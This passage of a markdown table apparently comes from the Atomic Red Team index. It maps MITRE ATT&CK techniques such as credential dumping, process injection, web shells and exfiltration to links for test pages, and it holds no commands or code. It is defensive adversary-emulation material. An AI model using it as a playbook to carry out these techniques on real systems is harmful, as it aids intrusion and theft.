| | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1145?T1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1033?T1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1071?T1071.md) |
| | [Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1107/T1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1007?T1007.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1032?T1032.md) |
| | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1006?T1006.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1167?T1167.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1124?T1124.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1095?T1095.md) |
| | [Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1062?T1062.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1178?T1178.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1144?T1144.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1111?T1111.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1065?T1065.md) |
| | [Service Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1035?T1035.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | [HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1148/T1148.md) | | | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md) |
| | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md) | [Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1215?T1215.md) | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1158/T1158.md) | | | | | | |
| | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md) | [LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1161?T1161.md) | [Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1166?T1166.md) | [Hidden Users](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1147?T1147.md) | | | | | | |
| | [Source](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1153?T1153.md) | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md) | [Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md) | [Hidden Window](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1143?T1143.md) | | | | | | |
| | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md) | [Launch Agent](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1159?T1159.md) | [Sudo](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1169?T1169.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | | | | | | |
| | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md) | [Sudo Caching](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1206?T1206.md) | [Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1054?T1054.md) | | | | | | |
| | [Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md) | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | [Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1066?T1066.md) | | | | | | |
| | [Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md) | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md) | [Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md) | [Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1070?T1070.md) | | | | | | |
| | [User Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1204?T1204.md) | [Login Item](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1162?T1162.md) | | [Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1202?T1202.md) | | | | | | |
| | [Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1047?T1047.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md) | | [Install Root Certificate](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1130/T1130.md) | | | | | | |
| | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1031?T1031.md) | | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md) | | | | | | |
| | | [Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1128?T1128.md) | | [LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1149?T1149.md) | | | | | | |
| | | [New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md) | | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | | | | | | |
| | | [Office Application Startup](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1137?T1137.md) | | [Masquerading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1036?T1036.md) | | | | | | |
| | | [Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md) | | [Modify Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1112?T1112.md) | | | | | | |
| | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | | [Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md) | | | | | | |
| | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) | | [NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1096?T1096.md) | | | | | | |
| | | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md) | | [Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1126?T1126.md) | | | | | | |
| | | [Rc.common](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1163?T1163.md) | | [Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1027?T1027.md) | | | | | | |
| | | [Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1164?T1164.md) | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md) | | | | | | |
| | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md) | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) | | | | | | |
| | | [Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1060?T1060.md) | | [Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1186?T1186.md) | | | | | | |
| | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md) | | [Process Hollowing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1093?T1093.md) | | | | | | |
| | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md) | | [Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md) | | | | | | |
| | | [Screensaver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1180?T1180.md) | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1108?T1108.md) | | | | | | |
| | | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1101?T1101.md) | | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md) | | | | | | |
| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md) | | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md) | | | | | | |
| | | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1023?T1023.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1014?T1014.md) | | | | | | |
| | | [Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md) | | [Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md) | | | | | | |
| | | [System Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1019?T1019.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1198?T1198.md) | | | | | | |
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1209?T1209.md) | | [Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md) | | | | | | |
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1045?T1045.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1084?T1084.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1004?T1004.md) | | [Timestomp](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md) | | | | | | |
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | | | | | | |
| | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md) | | | | | | |
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Audio Capture](./T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Compressed](./T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Bootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Forced Authentication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Domain Fronting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Browser Extensions](./T1176/T1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote File Copy](./T1105/T1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Screen Capture](./T1113/T1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Create Account](./T1136/T1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Shared Webroot](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Mshta](./T1170/T1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [PowerShell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Disabling Security Tools](./T1089/T1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
